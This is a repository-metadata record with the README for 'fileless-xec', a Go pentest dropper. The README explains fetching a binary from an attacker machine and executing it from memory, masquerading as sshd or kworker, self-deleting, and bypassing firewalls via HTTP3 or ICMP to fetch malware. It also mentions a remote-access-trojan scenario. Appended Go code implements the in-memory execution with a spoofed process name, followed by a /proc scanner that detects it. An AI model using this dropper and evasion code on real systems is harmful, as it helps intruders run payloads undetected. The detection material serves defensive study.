{"id":13509281,"url":"https://github.com/ariary/fileless-xec","last_synced_at":"2025-04-09T17:23:57.486Z","repository":{"id":49744317,"uuid":"405917716","full_name":"ariary/fileless-xec","owner":"ariary","description":"Stealth dropper executing remote binaries without dropping them on disk .(HTTP3 support, ICMP support, invisible tracks, cross-platform,...)","archived":false,"fork":false,"pushed_at":"2024-07-02T09:08:53.000Z","size":7088,"stargazers_count":195,"open_issues_count":1,"forks_count":39,"subscribers_count":7,"default_branch":"main","last_synced_at":"2025-04-02T10:33:29.569Z","etag":null,"topics":["bypass-firewall","dropper","fileless","golang","http3","memfd","pentest","pentest-tool","quic","security","stealth"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ariary.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-09-13T09:52:54.000Z","updated_at":"2024-12-23T09:36:56.000Z","dependencies_parsed_at":"2024-11-01T09:31:28.456Z","dependency_job_id":"c4912a35-af08-4735-a3ac-2ffaafd941a4","html_url":"https://github.com/ariary/fileless-xec","commit_stats":null,"previous_names":[],"tags_count":7,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Ffileless-xec","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Ffileless-xec/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Ffileless-xec/releases","manifests_url":"https://repos.e
cosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Ffileless-xec/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ariary","download_url":"https://codeload.github.com/ariary/fileless-xec/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248075496,"owners_count":21043597,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bypass-firewall","dropper","fileless","golang","http3","memfd","pentest","pentest-tool","quic","security","stealth"],"created_at":"2024-08-01T02:01:05.608Z","updated_at":"2025-04-09T17:23:57.452Z","avatar_url":"https://github.com/ariary.png","language":"Go","funding_links":[],"categories":["Go","security"],"sub_categories":[],"readme":"\u003ch1 align=center\u003e ➲ fileless-xec 🦜\u003c/h1\u003e\n\n\u003cdiv align=\"center\"\u003e\u003cimg src=\"https://github.com/ariary/fileless-xec/blob/main/img/fileless-small.png\"\u003e\u003c/div\u003e\n\n\u003cdiv align=\"center\"\u003e\n\u003ccode\u003e👋 Certainly useful, mainly for fun, roughly inspired by the 0x00sec \u003ca href=\"https://0x00sec.org/t/super-stealthy-droppers/3715\"\u003earticle\u003c/a\u003e\u003c/code\u003e\n\u003c/div\u003e\n\u003cbr\u003e\n\n***Pentest use:*** `fileless-xec` is run on the target machine to stealthily execute a binary located on the attacker machine.\n\n## ➲ Short story\n\n`fileless-xec` lets us execute a remote binary on the local machine directly from memory, without ever writing it to disk.\n\n**[➪ Install](https://github.com/ariary/fileless-xec/blob/main/install.md)**\n\n - simple usage 
`fileless-xec [binary_url]` (the `curl | sh` equivalent for binaries)\n - execute the binary under a chosen process name: `fileless-xec -n /usr/sbin/sshd [binary_url]`\n - detach the program from the `tty`: `fileless-xec --setsid [...]`\n\n![demo](https://github.com/ariary/fileless-xec/blob/main/img/fileless-xec.gif)\n\n\u003cdetails\u003e\n  \u003csummary\u003e\u003cb\u003eExplanation\u003c/b\u003e\u003c/summary\u003e\nWe want to locally execute the \u003ccode\u003ewriteNsleep\u003c/code\u003e binary located on a remote machine.\n\nWe first start a Python HTTP server on the remote machine.\nLocally we use \u003ccode\u003efileless-xec\u003c/code\u003e and impersonate the \u003ccode\u003e/usr/sbin/sshd\u003c/code\u003e name for the execution of the \u003ccode\u003ewriteNsleep\u003c/code\u003e binary (for stealthiness \u0026 fun). Once writeNsleep starts, fileless-xec deletes itself (\u003ccode\u003e--self-remove\u003c/code\u003e).\n\n\u003c/details\u003e\n\n### Other use cases\n\n* [Execute binary with stdout/stdin](https://github.com/ariary/fileless-xec/blob/main/usage.md#execute-binary-with-stdoutstdin)\n* [Execute binary with arguments](https://github.com/ariary/fileless-xec/blob/main/usage.md#execute-binary-with-arguments)\n* [`fileless-xec` self remove](https://github.com/ariary/fileless-xec/blob/main/usage.md#fileless-xec-self-remove)\n* [Bypass network restriction using ICMP](https://github.com/ariary/fileless-xec/blob/main/usage.md#bypass-network-restriction-with-icmp)\n* [Bypass firewall with HTTP3](https://github.com/ariary/fileless-xec/blob/main/usage.md#bypass-firewall-with-http3)\n* [\"Remote go\": execute go binaries without having go installed locally](https://github.com/ariary/fileless-xec/blob/main/usage.md#remote-go-execute-go-binaries-without-having-go-installed-locally)\n* [Execute a shell script](https://github.com/ariary/fileless-xec/blob/main/usage.md#execute-a-shell-script)\n* [`fileless-xec` server 
mode](https://github.com/ariary/fileless-xec/blob/main/usage.md#fileless-xec-server-mode)\n  * [RAT (Remote Access Trojan) scenario](https://github.com/ariary/fileless-xec/blob/main/usage.md#rat-remote-access-trojan-scenario)\n* [`fileless-xec` on windows](https://github.com/ariary/fileless-xec/blob/main/usage.md#fileless-xec-on-windows)\n\n## ➲ Stealthiness story\n\n* The binary is never written to the host file system\n* The process name shown for the executed binary can be customized\n* Next-generation (application-aware) firewalls can be bypassed thanks to HTTP3 support\n* `fileless-xec` removes itself once launched\n\n### memfd_create\nThe remote binary is stored locally using the `memfd_create` syscall, which creates an anonymous, RAM-backed file that is not linked into any directory of the file system (*ie* you can't find it using `ls`; the only handle to it is a file descriptor).\n\n***Note:*** the `memfd_create` syscall is Linux-specific; it does not exist on macOS.\n\n### fexecve\nThen we execute it using `fexecve` (a libc function rather than a syscall of its own; as it is currently not provided by the `syscall` golang library, we implement it).\n\n\u003e With `fexecve` we could exec a program, but we reference the program to run using a\n\u003e file descriptor, instead of the full path.\n\n### HTTP3/QUIC\n\u003ctable\u003e\u003ctr\u003e\u003ctd\u003e\nEnable it with the \u003ccode\u003e-Q\u003c/code\u003e/\u003ccode\u003ehttp3\u003c/code\u003e flag. 
\u003cbr\u003e\nYou can set up a light HTTP3 file server by running \u003ccode\u003ego run ./test/http3/light-server.go -p LISTENING PORT\u003c/code\u003e (this is the HTTP3 equivalent of \u003ccode\u003epython3 -m http.server \u003clistening_port\u003e\u003c/code\u003e).\u003cbr\u003e\nUse \u003ccode\u003etest/http3/genkey.sh\u003c/code\u003e to generate the certificate and key.\n\n\u003c/td\u003e\u003c/tr\u003e\u003c/table\u003e\n\n`QUIC`, the UDP-based transport underneath `http3`, is a new-generation Internet protocol that speeds up delay-sensitive web applications (search, video streaming, etc.) by reducing the round trips needed to establish a connection with a server.\n\nBecause QUIC encrypts almost everything, including most of its transport headers, with TLS 1.3 integrated into its handshake (RFC 9000 / RFC 9001), **next-generation firewalls that provide application control and visibility have a hard time inspecting and controlling QUIC traffic**, and many lack a parser for it altogether.\n\nIf you actually use `fileless-xec` as a dropper (***only for testing purposes or with authorization***), you likely want to fetch some kind of malware or another file that would be blocked by packet inspection. Hence, with QUIC enabled you can **bypass packet inspection and GET the malware**.\n\nAlso, when a firewall is only used to allow/block traffic, it can happen that **the rules cover TCP but forget UDP, letting your requests fly under the radar**.\n\n### Other tricks for stealthiness\n\nAlthough the binary never touches the disk, the running process can still be spotted with the `ps` command, for example.\n\n 1. Cover the tracks with a fake program name\n \n`fileless-xec --name \u003cfake_name\u003e \u003cbinary_raw_url\u003e`; by default the name is `[kworker/u:0]`\n\n 2. 
Detach from the tty to mimic the behaviour of a daemon process\n \n`fileless-xec --setsid \u003cbinary_raw_url\u003e`.\n\n### Caveats\nYou can still be detected with:\n```\n$ lsof | grep memfd\n```\n\nThe in-memory file shows up there as `/memfd:\u003cname\u003e (deleted)`, and the same path is exposed by the `/proc/\u003cpid\u003e/exe` symlink of the running process, whatever name was spoofed for `ps`.\n\nOr also with [`opensnoop`](https://github.com/brendangregg/perf-tools/blob/master/opensnoop) (but not with [`execsnoop`](https://github.com/brendangregg/perf-tools/blob/master/execsnoop)).\n\nOr with a seccomp profile (or audit rule) logging the `execve` syscall (but that is very noisy, as even a `sleep` command goes through `execve`).\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fariary%2Ffileless-xec","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fariary%2Ffileless-xec","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fariary%2Ffileless-xec/lists"}
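The memfd_create + fexecve mechanism from the README's "Stealthiness story" above, together with the fake process name (`--name`) and tty detachment (`--setsid`) tricks, as an added Go example that is not fileless-xec's own code. It assumes Linux with `/proc` mounted, hard-codes the `memfd_create` syscall numbers for amd64/arm64/386/arm rather than pulling in golang.org/x/sys, and performs the fexecve step the way glibc falls back to it: an execve on the magic link `/proc/self/fd/N` in the child. The payload read from `/bin/echo` in `main()` is only a stand-in for a binary fetched over the network, and setting argv[0] is my assumption about how a spoofed name is achieved; `RunFromMemory`, `memfdCreate` and `mfdCloexec` are names invented for this example.

```go
// Added example: execute an in-memory payload via memfd_create + "fexecve".
// Not fileless-xec's code; Linux-only, assumes /proc is mounted.
package main

import (
	"bytes"
	"errors"
	"fmt"
	"os"
	"os/exec"
	"runtime"
	"syscall"
	"unsafe"
)

const mfdCloexec = 0x1 // MFD_CLOEXEC from <sys/memfd.h>

// memfdCreate wraps the raw memfd_create(2) syscall using only the standard
// syscall package. Syscall numbers are per architecture (assumed table below).
func memfdCreate(name string, flags uintptr) (*os.File, error) {
	var nr uintptr
	switch runtime.GOARCH {
	case "amd64":
		nr = 319 // __NR_memfd_create on x86-64
	case "arm64":
		nr = 279 // __NR_memfd_create on aarch64
	case "386":
		nr = 356 // __NR_memfd_create on i386
	case "arm":
		nr = 385 // __NR_memfd_create on arm EABI
	default:
		return nil, fmt.Errorf("memfd_create syscall number unknown for %s", runtime.GOARCH)
	}
	cname, err := syscall.BytePtrFromString(name)
	if err != nil {
		return nil, err
	}
	fd, _, errno := syscall.Syscall(nr, uintptr(unsafe.Pointer(cname)), flags, 0)
	if errno != 0 {
		return nil, fmt.Errorf("memfd_create: %w", errno)
	}
	// The kernel names the anonymous file "/memfd:<name>"; that is what lsof shows.
	return os.NewFile(fd, "/memfd:"+name), nil
}

// RunFromMemory copies payload into an anonymous memfd and executes that file
// descriptor in a child process: argv[0] is replaced by fakeName (what ps
// displays), and setsid detaches the child from the controlling tty.
// It returns the child's combined stdout/stderr.
func RunFromMemory(payload []byte, fakeName string, setsid bool, args ...string) ([]byte, error) {
	if runtime.GOOS != "linux" {
		return nil, errors.New("memfd_create is Linux-only")
	}
	mem, err := memfdCreate("", mfdCloexec) // empty name: shows as "/memfd: (deleted)"
	if err != nil {
		return nil, err
	}
	defer mem.Close()
	if _, err := mem.Write(payload); err != nil {
		return nil, err
	}

	// ExtraFiles[0] becomes fd 3 in the child, so /proc/self/fd/3 there is a
	// magic link to the in-memory file. execve on that link is exactly glibc's
	// fexecve fallback when execveat is unavailable.
	cmd := exec.Command("/proc/self/fd/3", args...)
	cmd.Args = append([]string{fakeName}, args...) // spoofed argv[0]
	cmd.ExtraFiles = []*os.File{mem}
	if setsid {
		cmd.SysProcAttr = &syscall.SysProcAttr{Setsid: true}
	}
	var out bytes.Buffer
	cmd.Stdout = &out
	cmd.Stderr = &out
	if err := cmd.Run(); err != nil {
		return out.Bytes(), err
	}
	return out.Bytes(), nil
}

func main() {
	// Demo payload: the bytes of /bin/echo stand in for a binary fetched over
	// HTTP. The file on disk is only read; what runs is the memfd copy.
	payload, err := os.ReadFile("/bin/echo")
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	out, err := RunFromMemory(payload, "[kworker/u:0]", true, "hello from memory")
	if err != nil {
		fmt.Fprintln(os.Stderr, "exec failed:", err)
		os.Exit(1)
	}
	fmt.Print(string(out))
}
```

While the child runs, `ls -l /proc/<pid>/exe` resolves to `/memfd: (deleted)` even though `ps` prints `[kworker/u:0]`; on busybox-based systems the spoofed argv[0] also changes which applet runs, so the demo name only works with a real coreutils `echo`.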
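A detection-side counterpart to the README's "Caveats" section, added here and not part of the project: instead of `lsof | grep memfd`, it walks `/proc` and flags every process whose `/proc/<pid>/exe` link points at `/memfd:<name> (deleted)`, which is how the kernel renders an image executed from a memfd. A spoofed argv[0] does not hide the process here, because the `exe` link is maintained by the kernel, not by the program. The proc root is a parameter so the scan can be pointed at a constructed fake tree; `Finding`, `IsMemfdExe` and `ScanProc` are names invented for this example.

```go
// Added example: find processes executing from a memfd by reading /proc/<pid>/exe.
// Not fileless-xec's code. Linux-only; read-only access to /proc is enough for
// the caller's own processes, CAP_SYS_PTRACE (root) for everyone else's.
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strconv"
	"strings"
)

// Finding describes one process whose executable image lives in a memfd.
type Finding struct {
	PID     int
	Exe     string // target of /proc/<pid>/exe, e.g. "/memfd:payload (deleted)"
	Cmdline string // argv as ps shows it, possibly spoofed by the program
}

// IsMemfdExe reports whether an exe link target denotes a memfd-backed image.
// The kernel renders such targets as "/memfd:<name> (deleted)"; name may be empty.
func IsMemfdExe(target string) bool {
	return strings.HasPrefix(target, "/memfd:") && strings.HasSuffix(target, " (deleted)")
}

// ScanProc walks procRoot (normally "/proc") and returns the processes whose
// executable is a memfd. Entries that are not PIDs, kernel threads (no exe
// link), processes that exited mid-scan, or EACCES targets are skipped.
func ScanProc(procRoot string) ([]Finding, error) {
	entries, err := os.ReadDir(procRoot)
	if err != nil {
		return nil, err
	}
	var found []Finding
	for _, e := range entries {
		pid, err := strconv.Atoi(e.Name())
		if err != nil || !e.IsDir() {
			continue // not a process directory
		}
		target, err := os.Readlink(filepath.Join(procRoot, e.Name(), "exe"))
		if err != nil {
			continue // kernel thread, already exited, or not ours without CAP_SYS_PTRACE
		}
		if !IsMemfdExe(target) {
			continue
		}
		// cmdline is NUL-separated; a fake --name shows up here, the exe link does not lie.
		raw, _ := os.ReadFile(filepath.Join(procRoot, e.Name(), "cmdline"))
		cmd := strings.TrimRight(strings.ReplaceAll(string(raw), "\x00", " "), " ")
		found = append(found, Finding{PID: pid, Exe: target, Cmdline: cmd})
	}
	return found, nil
}

func main() {
	hits, err := ScanProc("/proc")
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	for _, h := range hits {
		fmt.Printf("pid %d exe=%q cmdline=%q\n", h.PID, h.Exe, h.Cmdline)
	}
	fmt.Printf("%d process(es) running from a memfd\n", len(hits))
}
```

Run it as root to see other users' processes; a hit whose `Cmdline` claims to be `/usr/sbin/sshd` while `Exe` is `/memfd:... (deleted)` is exactly the `--name` trick from the README being caught.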